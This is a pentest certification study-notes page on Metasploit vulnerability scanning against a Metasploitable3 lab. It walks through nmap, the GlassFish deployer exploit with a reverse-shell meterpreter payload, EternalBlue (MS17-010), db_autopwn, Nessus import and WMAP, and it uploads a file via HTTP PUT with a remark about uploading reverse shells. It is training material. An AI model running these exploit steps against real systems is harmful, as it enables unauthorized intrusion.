eCPPTv3-PTP-Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝eCPPT / PTP - Notes
    • eCPPTv3
      • 1️⃣1 - Resource Development & Initial Access
        • 1.1 - PowerShell for Pentesters
        • 1.2 - Client-Side Attacks
          • 1.2.1 - System/Host Based Attacks
            • 1.2.1.1 Windows Vulnerabilities
          • 1.2.2 - The Metasploit Framework (MSF)
            • 1.2.2.1 MSF Introduction
            • 1.2.2.2 Information Gathering & Enumeration
            • 1.2.2.3 Vulnerability Scanning
            • 1.2.2.4 Client-Side Attacks
            • 1.2.2.5 Post Exploitation
            • 1.2.2.6 Armitage
          • 1.2.3 Exploitation
          • 1.2.4 Social Engineering
      • 2️⃣2 - Web Application Penetration Testing
        • 2.1 - Web App Concepts
          • 2.1.1 HTTP/S Protocol
          • 2.1.2 Encoding
          • 2.1.3 Same Origin
          • 2.1.4 Cookies
          • 2.1.5 Session
          • 2.1.6 Web App Proxies
        • 2.2 - Information Gathering
          • 2.2.1 Gathering Information on Your Targets
          • 2.2.2 Infrastructure
          • 2.2.3 Fingerprinting Frameworks and Applications
          • 2.2.4 Fingerprinting Custom Applications
          • 2.2.5 Enumerating Resources
          • 2.2.6 Information Disclosure Through Misconfiguration
          • 2.2.7 Google Hacking
          • 2.2.8 Shodan HQ
        • 2.3 - Cross Site Scripting
          • 2.3.1 XSS Anatomy
          • 2.3.2 Reflected XSS
          • 2.3.3 Stored XSS
          • 2.3.4 DOM-Based XSS
          • 2.3.5 Identifying & Exploiting XSS with XSSer
        • 2.4 - SQL Injection
          • 2.4.1 Introduction to SQL Injection
          • 2.4.2 Finding SQL Injection
          • 2.4.3 Exploiting In-Band SQL Injection
          • 2.4.4 Exploiting Error-Based SQL Injection
          • 2.4.5 Exploiting Blind SQL Injection
          • 2.4.6 SQLMap
          • 2.4.7 Mitigation Strategies
          • 2.4.8 From SQLi to Server Takeover
        • 2.5 - Other Common Web Attacks
          • 2.5.1 Session Attacks
          • 2.5.2 CSRF
          • 2.5.3 File and Resource Attacks
      • 3️⃣3 - Network Security
        • 3.1 Network Based Attacks
        • 3.2 Linux Vulnerabilities
        • 3.3 - Exploitation
          • 3.3.1 Linux Exploitation
      • 4️⃣4 - Exploit Development
        • 4.1 Architecture Foundamentals
        • 4.2 Assemblers and Tools
        • 4.3 Buffer Overflow
        • 4.4 Cryptography
        • 4.5 Malware
        • 4.6 Shellcoding
      • 5️⃣5 - Post-Exploitation
        • 5.1 Linux Post-Exploitation
        • 5.2 - Linux Privilege Escalation
          • 5.2.1 Kernel Exploitation
          • 5.2.2 SUID Exploitation
          • 5.2.3 CronJobs
        • 5.3 - Post Expolitation / Pivoting
          • 5.3.1 Pivoting Guidelines
          • 5.3.2 Pivoting Example (3 Targets)
      • 6️⃣6 - ​Red Teaming
        • 6.1 - Active Directory Penetration Testing
          • 6.1.1 Introduction to Active Directory (AD)
            • 6.1.1.1 Users, Groups & Computers
            • 6.1.1.2 Organizational Units (OUs)
            • 6.1.1.3 Trees, Forest & Trust
          • 6.1.2 AD Authentication
          • 6.1.3 AD Penetration Testing Methodology
        • 6.1.4 AD Enumeration
        • 6.1.5 AD Privilege Escalation
        • 6.1.6 AD Lateral Movement
        • 6.1.7 AD Persistence
        • 6.2 - Command & Control (C2/C&C)
    • eCPPTv2
      • 1️⃣1 - ​System Security
        • 1.1 Architecture Foundamentals
        • 1.2 Assemblers and Tools
        • 1.3 Buffer Overflow
        • 1.4 Cryptography
        • 1.5 Malware
        • 1.6 Shellcoding
      • 2️⃣2 - Network Security
        • 2.1 System/Host Based Attacks
          • 2.1.1 Windows Vulnerabilities
        • 2.2 Network Based Attacks
        • 2.3 The Metasploit Framework (MSF)
          • MSF Introduction
          • Information Gathering & Enumeration
          • Vulnerability Scanning
          • Client-Side Attacks
          • Post Exploitation
          • Armitage
        • 2.4 Exploitation
        • 2.5 - Post Expolitation / Pivoting
          • 2.5.1 Pivoting Guidelines
          • 2.5.2 Pivoting Example (3 Targets)
        • 2.6 Social Engineering
      • 3️⃣3 - PowerShell for PT
        • 3.1 PowerShell
      • 4️⃣4 - Linux Exploitation
        • 4.1 Linux Vulnerabilities
        • 4.2 Linux Exploitation
        • 4.3 Linux Post-Exploitation
        • 4.4 Linux Privilege Escalation
          • 4.4.1 Kernel Exploitation
          • 4.4.2 SUID Exploitation
          • 4.4.3 CronJobs
      • 5️⃣5 - Web App Security
        • 5.1 - Web App Concepts
          • 5.1.1 HTTP/S Protocol
          • 5.1.2 Encoding
          • 5.1.3 Same Origin
          • 5.1.4 Cookies
          • 5.1.5 Session
          • 5.1.6 Web App Proxies
        • 5.2 - Information Gathering
          • 5.2.1 Gathering Information on Your Targets
          • 5.2.2 Infrastructure
          • 5.2.3 Fingerprinting Frameworks and Applications
          • 5.2.4 Fingerprinting Custom Applications
          • 5.2.5 Enumerating Resources
          • 5.2.6 Information Disclosure Through Misconfiguration
          • 5.2.7 Google Hacking
          • 5.2.8 Shodan HQ
        • 5.3 - Cross Site Scripting
          • 5.3.1 XSS Anatomy
          • 5.3.2 Reflected XSS
          • 5.3.3 Stored XSS
          • 5.3.4 DOM-Based XSS
          • 5.3.5 Identifying & Exploiting XSS with XSSer
        • 5.4 - SQL Injection
          • 5.4.1 Introduction to SQL Injection
          • 5.4.2 Finding SQL Injection
          • 5.4.3 Exploiting In-Band SQL Injection
          • 5.4.4 Exploiting Error-Based SQL Injection
          • 5.4.5 Exploiting Blind SQL Injection
          • 5.4.6 SQLMap
          • 5.4.7 Mitigation Strategies
          • 5.4.8 From SQLi to Server Takeover
        • 5.5 - Other Common Web Attacks
          • 5.5.1 Session Attacks
          • 5.5.2 CSRF
      • 6️⃣6 - ​Wi-Fi Security
        • 6.1 Traffic Analysis
      • 7️⃣7 - ​Metasploit & Ruby
        • 7.1 Metasploit
      • 📄Report
        • How to write a PT Report
  • 🛣️RoadMap & My Experience
  • 📔eCPPT Cheat Sheet
Powered by GitBook
On this page
  • Vulnerability Scanning With MSF
  • VA with Nessus​
  1. eCPPT / PTP - Notes
  2. eCPPTv3
  3. 1 - Resource Development & Initial Access
  4. 1.2 - Client-Side Attacks
  5. 1.2.2 - The Metasploit Framework (MSF)

1.2.2.3 Vulnerability Scanning

Previous1.2.2.2 Information Gathering & EnumerationNext1.2.2.4 Client-Side Attacks

Vulnerability Scanning With MSF

MSF Auxiliary and exploit modules can be utilized to identify inherent vulnerabilities in services, O.S. and web apps.

  • Useful in the Exploitation phase of the pentest

🔬 lab environment will be used for the vulnerability scanning demonstration.

  • Metasploitable3 is a vulnerable virtual machine developed by Rapid7, intended to be used as a vulnerable target for testing exploits with Metasploit.

🔬 You can find my lab installation & configuration with Vagrant at , set up for educational purposes.

  • Kali Linux attacker machine must be configured with the same local network of the Metasploitable3 VMs.

Detect active hosts on the local network, from the Kali VM:sudo nmap -sn 192.168.31.0/24Nmap scan report for 192.168.31.139 # Linux targetNmap scan report for 192.168.31.140 # Windows2008 target

  • Run Metasploit:

service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.140setg RHOST 192.168.31.140workspace -a VULN_SCAN_MS3

  • Service version is a key piece of information for the vulnerabilities scanning. Use the db_nmap command inside the MSF

db_nmap -sS -sV -O 192.168.31.140[*] Nmap: 21/tcp open ftp Microsoft ftpd[*] Nmap: 22/tcp open ssh OpenSSH 7.1 (protocol 2.0)[*] Nmap: 80/tcp open http Microsoft IIS httpd 7.5[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds[*] Nmap: 3306/tcp open mysql MySQL 5.5.20-log[*] Nmap: 3389/tcp open tcpwrapped[*] Nmap: 4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 7676/tcp open java-message-service Java Message Service 301[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)[*] Nmap: 8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8383/tcp open http Apache httpd[*] Nmap: 9200/tcp open wap-wsp?[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC[...]db_nmaphostsservices

  • Manually search for a specific exploit

    • Check if there are any exploits for a particular version of a service

search type:exploit name:iissearch type:exploit name:iissearch Sun GlassFish

  • Check if a module will work on the specific version of the service

use exploit/multi/http/glassfish_deployerinfo​# Description:# This module logs in to a GlassFish Server (Open Source or# Commercial) using various methods (such as authentication bypass,# default credentials, or user-supplied login), and deploys a# malicious war file in order to get remote code execution. It has# been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System# Application Server 9.x. Newer GlassFish versions do not allow remote# access (Secure Admin) by default, but is required for exploitation.set payload windows/meterpreter/reverse_tcpoptions# check the LHOST, LPORT, APP_RPORT, RPORT, PAYLOAD options

searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"

  • Back in msfconsole, check if the server is vulnerable to MS17-010

search eternalblueuse auxiliary/scanner/smb/smb_ms17_010runuse exploit/windows/smb/ms17_010_eternalblueoptions# always check Payload optionsrun

  • takes a look at the Metasploit database and provides a list of exploit modules to use for the already enumerated services

  • On a Kali terminal

wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rbsudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/

  • On msfconsole

load db_autopwndb_autopwn -p -t# Enumerates exploits for each of the open portsdb_autopwn -p -t -PI 445# Limit to only the 445 portdb_autopwn -p -t -PI 445

  • On msfconsole use the analyze command to auto analyze the contents of the MSFdb (hosts & services)

analyzeanalyzevulnsvulns

  • A vulnerability scan with Nessus result can be imported into the MSF for analysis and exploitation.

  • Nessus Essentials free version allows to scan up to 16 IPs.

Start Nessus Essentials on the Kali VM, login and create a New Basic Network Scan and run it.Wait for the scan conclusion and export the results with the Export/Nessus button.Nessus Essentials - Metasploitable3

  • Open the msfconsole terminal and import the Nessus results

    • Check the information from the scan results with the hosts, services, vulns commands

workspace -a MS3_NESSUSdb_import /home/kali/Downloads/MS3_zph3t5.nessushostsservicesvulnsvulns -p 445search cve:2017 name:smbsearch MS12-020search cve:2019 name:rdpsearch cve:2015 name:ManageEnginesearch PHP CGI Argument Injection

🗒️ WMAP is a web application vulnerability scanner that allows to conduct and automate web server enumeration and scanning from within the Metasploit Framework.

  • Available as a fully integrated MSF plugin

  • Utilizes the in-built MSF auxiliary modules

ip -br -c a192.28.60.3# Target IP​service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.28.60.3setg RHOST 192.28.60.3workspace -a WMAP_SCAN

  • Load WMAP extension within msfconsole

load wmapload wmap

  • Add WMAP site

wmap_sites -a 192.28.60.3

  • Specify the target URL

wmap_targets -t http://192.28.60.3wmap_sites -lwmap_targets -l

  • Show only the MSF modules that will be able to be run against target

wmap_run -t

  • Run the web app vulnerability scan

    • this will run all enabled modules against the target web server

wmap_run -e

  • Analyze the results produced by WMAP.

wmap_run -twmap_run -e

  • List WMAP found vulnerabilities

wmap_vulns -l

  • Since the allowed methods are POST, OPTIONS, GET, HEAD, exploit the vulnerability with the use of auxiliary/scanner/http/http_put module to upload a file into the /data directory

    • 📌 A reverse shell payload can be uploaded and run on the target.

use auxiliary/scanner/http/http_putoptionsset PATH /data/set FILEDATA "File uploaded"set FILENAME file.txtrunMetasploit - auxiliary/scanner/http/http_put

  • Test if the file has been uploaded correctly

curl http://192.28.60.3:80/data/file.txt

Use tool from the Kali terminal, instead of search MSF command, by displaying only the Metasploit exploit modules

​ - a Metasploit plugin for easy exploit & vulnerability attack.

VA with ​

🔬 You can find my .

VA with ​

🔬 The lab is the same one from the HTTP Metasploit Enumeration section above - ​

📝
1️⃣
searchsploit
metasploit-autopwn
Nessus
Nessus Essentials install tutorial here
WMAP
Metasploit - Apache Enumeration Lab
Metasploitable3
this page